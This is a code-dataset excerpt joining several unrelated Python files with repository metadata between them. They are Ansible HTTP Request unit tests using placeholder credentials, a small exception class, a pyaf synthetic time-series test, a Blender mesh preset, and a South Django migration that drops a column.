cookies = cookiejar.CookieJar()
request = Request(
headers={'foo': 'bar'},
use_proxy=False,
force=True,
timeout=100,
validate_certs=False,
url_username='user',
url_password='passwd',
http_agent='ansible-tests',
force_basic_auth=True,
follow_redirects='all',
client_cert='/tmp/client.pem',
client_key='/tmp/client.key',
cookies=cookies,
unix_socket='/foo/bar/baz.sock',
ca_path='/foo/bar/baz.pem',
)
fallback_mock = mocker.spy(request, '_fallback')
r = request.open('GET', 'https://ansible.com')
calls = [
call(None, False), # use_proxy
call(None, True), # force
call(None, 100), # timeout
call(None, False), # validate_certs
call(None, 'user'), # url_username
call(None, 'passwd'), # url_password
call(None, 'ansible-tests'), # http_agent
call(None, True), # force_basic_auth
call(None, 'all'), # follow_redirects
call(None, '/tmp/client.pem'), # client_cert
call(None, '/tmp/client.key'), # client_key
call(None, cookies), # cookies
call(None, '/foo/bar/baz.sock'), # unix_socket
call(None, '/foo/bar/baz.pem'), # ca_path
]
fallback_mock.assert_has_calls(calls)
assert fallback_mock.call_count == 14 # All but headers use fallback
args = urlopen_mock.call_args[0]
assert args[1] is None # data, this is handled in the Request not urlopen
assert args[2] == 100 # timeout
req = args[0]
assert req.headers == {
'Authorization': b'Basic dXNlcjpwYXNzd2Q=',
'Cache-control': 'no-cache',
'Foo': 'bar',
'User-agent': 'ansible-tests'
}
assert req.data is None
assert req.get_method() == 'GET'
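# (Note on the counts above: headers are merged directly when building the
# request rather than routed through _fallback, so only the remaining 14
# keyword arguments produce call(None, <instance default>) pairs.)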
def test_Request_open(urlopen_mock, install_opener_mock):
r = Request().open('GET', 'https://ansible.com/')
args = urlopen_mock.call_args[0]
assert args[1] is None # data, this is handled in the Request not urlopen
assert args[2] == 10 # timeout
req = args[0]
assert req.headers == {}
assert req.data is None
assert req.get_method() == 'GET'
opener = install_opener_mock.call_args[0][0]
handlers = opener.handlers
if not HAS_SSLCONTEXT:
expected_handlers = (
SSLValidationHandler,
RedirectHandlerFactory(), # factory, get handler
)
else:
expected_handlers = (
RedirectHandlerFactory(), # factory, get handler
)
found_handlers = []
for handler in handlers:
if isinstance(handler, SSLValidationHandler) or handler.__class__.__name__ == 'RedirectHandler':
found_handlers.append(handler)
assert len(found_handlers) == len(expected_handlers)
def test_Request_open_http(urlopen_mock, install_opener_mock):
r = Request().open('GET', 'http://ansible.com/')
args = urlopen_mock.call_args[0]
opener = install_opener_mock.call_args[0][0]
handlers = opener.handlers
found_handlers = []
for handler in handlers:
if isinstance(handler, SSLValidationHandler):
found_handlers.append(handler)
assert len(found_handlers) == 0
def test_Request_open_unix_socket(urlopen_mock, install_opener_mock):
r = Request().open('GET', 'http://ansible.com/', unix_socket='/foo/bar/baz.sock')
args = urlopen_mock.call_args[0]
opener = install_opener_mock.call_args[0][0]
handlers = opener.handlers
found_handlers = []
for handler in handlers:
if isinstance(handler, UnixHTTPHandler):
found_handlers.append(handler)
assert len(found_handlers) == 1
def test_Request_open_https_unix_socket(urlopen_mock, install_opener_mock):
r = Request().open('GET', 'https://ansible.com/', unix_socket='/foo/bar/baz.sock')
args = urlopen_mock.call_args[0]
opener = install_opener_mock.call_args[0][0]
handlers = opener.handlers
found_handlers = []
for handler in handlers:
if isinstance(handler, HTTPSClientAuthHandler):
found_handlers.append(handler)
assert len(found_handlers) == 1
inst = found_handlers[0]._build_https_connection('foo')
assert isinstance(inst, UnixHTTPSConnection)
def test_Request_open_ftp(urlopen_mock, install_opener_mock, mocker):
mocker.patch('ansible.module_utils.urls.ParseResultDottedDict.as_list', side_effect=AssertionError)
# Using ftp scheme should prevent the AssertionError side effect to fire
r = Request().open('GET', 'ftp://foo@ansible.com/')
def test_Request_open_headers(urlopen_mock, install_opener_mock):
r = Request().open('GET', 'http://ansible.com/', headers={'Foo': 'bar'})
args = urlopen_mock.call_args[0]
req = args[0]
assert req.headers == {'Foo': 'bar'}
def test_Request_open_username(urlopen_mock, install_opener_mock):
r = Request().open('GET', 'http://ansible.com/', url_username='user')
    opener = install_opener_mock.call_args[0][0]
handlers = opener.handlers
expected_handlers = (
urllib_request.HTTPBasicAuthHandler,
urllib_request.HTTPDigestAuthHandler,
)
found_handlers = []
for handler in handlers:
        if isinstance(handler, expected_handlers):
found_handlers.append(handler)
assert len(found_handlers) == 2
assert found_handlers[0].passwd.passwd[None] == {(('ansible.com', '/'),): ('user', None)}
def test_Request_open_username_in_url(urlopen_mock, install_opener_mock):
r = Request().open('GET', 'http://user2@ansible.com/')
opener = install_opener_mock.call_args[0][0]
handlers = opener.handlers
expected_handlers = (
urllib_request.HTTPBasicAuthHandler,
urllib_request.HTTPDigestAuthHandler,
)
found_handlers = []
for handler in handlers:
if isinstance(handler, expected_handlers):
found_handlers.append(handler)
assert found_handlers[0].passwd.passwd[None] == {(('ansible.com', '/'),): ('user2', '')}
def test_Request_open_username_force_basic(urlopen_mock, install_opener_mock):
r = Request().open('GET', 'http://ansible.com/', url_username='user', url_password='passwd', force_basic_auth=True)
opener = install_opener_mock.call_args[0][0]
handlers = opener.handlers
expected_handlers = (
urllib_request.HTTPBasicAuthHandler,
urllib_request.HTTPDigestAuthHandler,
)
found_handlers = []
for handler in handlers:
if isinstance(handler, expected_handlers):
found_handlers.append(handler)
assert len(found_handlers) == 0
args = urlopen_mock.call_args[0]
req = args[0]
assert req.headers.get('Authorization') == b'Basic dXNlcjpwYXNzd2Q='
def test_Request_open_auth_in_netloc(urlopen_mock, install_opener_mock):
r = Request().open('GET', 'http://user:passwd@ansible.com/')
args = urlopen_mock.call_args[0]
req = args[0]
assert req.get_full_url() == 'http://ansible.com/'
opener = install_opener_mock.call_args[0][0]
handlers = opener.handlers
expected_handlers = (
urllib_request.HTTPBasicAuthHandler,
        urllib_request.HTTPBasicAuthHandler,
        urllib_request.HTTPDigestAuthHandler,
    )
|
szopu/datadiffs
|
datadiffs/exceptions.py
|
Python
|
mit
| 46 | 0 |
class InvalidValueState(ValueError):
pass
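# Illustrative use (not part of this module): since InvalidValueState
# subclasses ValueError, callers can raise it for a value in an unexpected
# state and still catch it with a generic ValueError handler, e.g.:
#
#     raise InvalidValueState('cannot diff value in this state')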
|
antoinecarme/pyaf
|
tests/artificial/transf_Integration/trend_ConstantTrend/cycle_12/ar_12/test_artificial_128_Integration_ConstantTrend_12_12_0.py
|
Python
|
bsd-3-clause
| 271 | 0.084871 |
import pyaf.Bench.TS_datasets as tsds
import tests.artificial.process_artificial_dataset as art
art.process_dataset(N = 128 , FREQ = 'D', seed = 0, trendtype = "ConstantTrend", cycle_length = 12, transform = "Integration", sigma = 0.0, exog_count = 0, ar_order = 12);
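# (Assumed behaviour, inferred from the argument names: process_dataset builds
# a 128-point daily synthetic series with a constant trend, a length-12 cycle
# and an AR(12) component, applies the Integration transform, then fits pyaf's
# forecasting models against it.)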
|
Microvellum/Fluid-Designer
|
win64-vc/2.78/Python/bin/2.78/scripts/addons/presets/operator/mesh.primitive_round_cube_add/Capsule.py
|
Python
|
gpl-3.0
| 141 | 0 |
import bpy
op = bpy.context.active_operator
op.radius = 0.5
op.arc_div = 8
op.lin_div = 0
op.size = (0.0, 0.0, 3.0)
op.div_type = 'CORNERS'
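# Note (assumed execution context): Blender runs preset files like this one
# while the matching operator is active, so bpy.context.active_operator
# resolves to mesh.primitive_round_cube_add and the op.* lines fill in its
# properties.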
|
SeedScientific/polio
|
source_data/migrations/0113_auto__del_field_sourceregion_is_high_risk.py
|
Python
|
agpl-3.0
| 20,716 | 0.008351 |
# -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Deleting field 'SourceRegion.is_high_risk'
db.execute('''
ALTER TABLE source_region
DROP COLUMN is_high_risk;
''')
def backwards(self, orm):
# Adding field 'SourceRegion.is_high_risk'
pass
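        # The generated reversal above is a no-op; a hedged sketch of a true
        # reverse migration would re-create the column (boolean type assumed,
        # since the original field definition is not shown here):
        #
        #     db.execute('''
        #         ALTER TABLE source_region
        #         ADD COLUMN is_high_risk boolean;
        #     ''')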
models = {
u'auth.group': {
'Meta': {'object_name': 'Group'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
u'auth.permission': {
'Meta': {'ordering': "(u'content_type__app_label', u'content_type__model', u'codename')", 'unique_together': "((u'content_type', u'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
u'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "u'user_set'", 'blank': 'True', 'to': u"orm['auth.Group']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "u'user_set'", 'blank': 'True', 'to': u"orm['auth.Permission']"}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
u'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
u'datapoints.campaign': {
'Meta': {'ordering': "('-start_date',)", 'unique_together': "(('office', 'start_date'),)", 'object_name': 'Campaign', 'db_table': "'campaign'"},
'campaign_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['datapoints.CampaignType']"}),
'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'end_date': ('django.db.models.fields.DateField', [], {}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'office': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['datapoints.Office']"}),
'slug': ('autoslug.fields.AutoSlugField', [], {'unique': 'True', 'max_length': '50', 'populate_from': "'get_full_name'", 'unique_with': '()'}),
'start_date': ('django.db.models.fields.DateField', [], {})
},
u'datapoints.campaigntype': {
'Meta': {'object_name': 'CampaignType', 'db_table': "'campaign_type'"},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '55'})
},
u'datapoints.indicator': {
'Meta': {'ordering': "('name',)", 'object_name': 'Indicator', 'db_table': "'indicator'"},
'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_reported': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255'}),
'short_name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255'}),
'slug': ('autoslug.fields.AutoSlugField', [], {'unique': 'True', 'max_length': '255', 'populate_from': "'name'", 'unique_with': '()'}),
'source': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['datapoints.Source']"})
},
u'datapoints.office': {
'Meta': {'object_name': 'Office', 'db_table': "'office'"},
'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '55'})
},
u'datapoints.region': {
'Meta': {'unique_together': "(('name', 'region_type', 'office'),)", 'object_name': 'Region', 'db_table': "'region'"},
'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'latitude': ('django.db.models.fields.FloatField', [], {'null': 'True', 'blank': 'True'}),
'longitude': ('django.db.models.fields.FloatField', [], {'null': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255'}),
'office': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['datapoints.Office']"}),
            'parent_region': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['datapoints.Region']", 'null': 'True'}),
'region_code': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255'}),
'region_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['datapoints.RegionType']"}),
'slug': ('autoslug.fields.AutoSlugField', [], {'unique': 'True', 'max_length': '255', 'populate_from': "'name'", 'unique_with': '()'}),
'source': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['datapoints.Source']"})
},
u'datapoints.regiontype': {
'Meta': {'object_name': 'RegionType', 'db_table': "'region_type'"},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '55'})
},
u'datapoints.source': {
'Meta': {'object_name': 'Source', 'db_table': "'source'"},
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
|